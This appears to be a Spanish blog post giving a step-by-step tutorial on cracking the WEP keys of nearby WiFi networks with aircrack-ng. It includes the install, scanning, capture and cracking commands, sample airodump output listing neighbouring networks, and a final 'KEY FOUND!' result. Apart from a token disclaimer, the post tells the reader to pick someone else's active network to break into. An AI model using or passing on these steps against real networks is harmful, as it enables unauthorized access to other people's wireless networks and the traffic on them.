espero seais buenos y lo useis solo para eso .
lo primero instalar el aircrack si no lo tenemos instalado:
desde consola tecleamos sudo apt-get install aircrack
Abrimos una consola desde el menú Applications.
Cambiamos al usuario superior:
sudo -i
Miramos cual es la conexión WiFi:
iwconfig
Lo normal es que se llame wlan0.pero si no ponemos el nombre que nos de :
Ahora buscamos las redes accesibles para elegir una para crakear:
airodump-ng wlan0
airodump esto es para poner la tarjeta en modo monitor si no la acepta pero si no nos deja ponerla linux nos dice lo ke tenemos ke ejecutar
Elije una red con protección WEP y donde veas que lleguen algunos paquetes en la columna data.
Esto significa que alguien está usando su linea en este momento lo que es importante para la capturación.
Una vez elegido la red, nos apuntamos su número de canal (que será 11 en nuestro ejemplo).
podemos empezar a capturar datos
Ahora estamos listos para capturar paquetes.
Antes de lanzar el siguiente comando de aircrack-ng, quizás queras hacer un cd ... a cualquier otro directorio que no sea el Desktop.
Esto va a guardar todos los paquetes importantes que lleguen en el canal 11 en el fichero <...>.ivs y información sobre los redes en <...>.txt
Durante la captura vemos algo parecido a esto en la consola: aki el 11 es un ejemplo puede variar el canal segun el router
airodump-ng -c 11 --ivs -w
sudo airodump-ng -c 11 --ivs -w prueba wlan0 comando para copiar y pegar en mi caso de prueba
CH 11 ][ Elapsed: 52 s ][ 2006-11-12 12:48
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:60:B3:EE:84:E2 -1 0 2 0 0 9 54. WEP WEP WLAN_69
00:16:E3:0B:1D:14 -1 62 317 0 0 11 48 WEP WEP MiCasa
00:11:F5:1B:34:DA -1 100 363 0 0 11 48 WEP WEP myred
00:03:C9:E6:18:73 -1 96 460 0 0 11 48 WEP WEP Jazztel Wireless
00:03:C9:8D:33:E3 -1 96 469 0 0 11 48 WEP WEP Telefonica
00:03:C9:8D:34:0A -1 18 118 45 0 11 48 WEP WEP PSK Comtrend
00:03:C9:D2:0E:F6 -1 83 395 0 0 11 54. WPA TKIP PSK LINE IP
BSSID STATION PWR Lost Packets Probes
00:03:C9:E6:18:73 00:C0:A8:A8:81:8E -1 0 1
00:03:C9:8D:34:0A 00:0E:35:EE:DE:F2 -1 0 135 Comtrend
Nos fijamos sobre todo en la columna #Data.
El valor debe aumentar lo bastante rápido para la red o redes que queremos craquear.
Desgraciadamente, necesitamos bastantes paquetes, se recomienda por lo menos 250.000, aunque he conseguido conseguir la clave también ya con 40.000.
Si el valor de la columna #/s está alrededor de 40, se puede calcular que haga falta capturar durante unos dos horas para tener lo suficiente.
Por eso, es importante que la red en cuestión tenga un cliente conectado y que éste esté usándolo bastante.
En el momento que tenemos suficientes paquetes capturados podemos intentar conseguir la clave.
Para ello no es necesario parar airodump-ng, sino simplemente abrimos otra consola y lanzamos aircrack-ng con el fichero de captura:
aircrack-ng -n -y prueba-01.ivs el simbolo n lo podeis cambiar por x o añadir al lado 128,256,512 depende la encriptacion del router
Opening channel1-01.ivs
Opening channel1_1-01.ivs
Opening channel11-01.ivs
.....Read 479626 packets.
# BSSID ESSID Encryption
1 00:A0:C5:EE:14:75 WEP (56 IVs)
2 00:01:38:54:BD:EB WEP (40551 IVs)
3 00:11:F5:1B:34:DA WEP (87 IVs)
4 00:03:C9:E6:18:73 WEP (234 IVs)
5 00:03:C9:8D:34:0A WEP (438368 IVs)
[00:00:01] Tested 141019 keys (got 40551 IVs)
KB depth byte(vote)
0 1/ 5 AB( 15) 22( 5) 77( 5) F7( 3) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0)
1 2/ 6 13( 9) 4B( 8) 84( 5) C9( 5) 07( 3) 0A( 3) 1C( 3) 49( 3) 54( 3) 5A( 3)
2 0/ 1 CA( 43) 33( 8) 01( 5) 5D( 5) 89( 5) 92( 5) C7( 5) D5( 5) F0( 5) FC( 5)
3 0/ 58 48( 25) 79( 16) 62( 15) F0( 15) 03( 13) 89( 13) 91( 13) 2F( 11) 25( 10) A9( 10)
KEY FOUND! [ 45:13:F0:48:DB ]
Como se está capturando paquetes de todas las redes en el canal, aircrack-ng nos deja elegir cual queremos atacar.
Después de pocos segundos nos apare la clave en hexa-decimal.
Si no es así entonces no hay lo suficientes paquetes. O sea, si aircrack-ng se queda calculando durante minutos, paralo, porque no llegan a ningún lado.
Si encuentra la clave, es después de 2 segundos.
No hay comentarios:
Publicar un comentario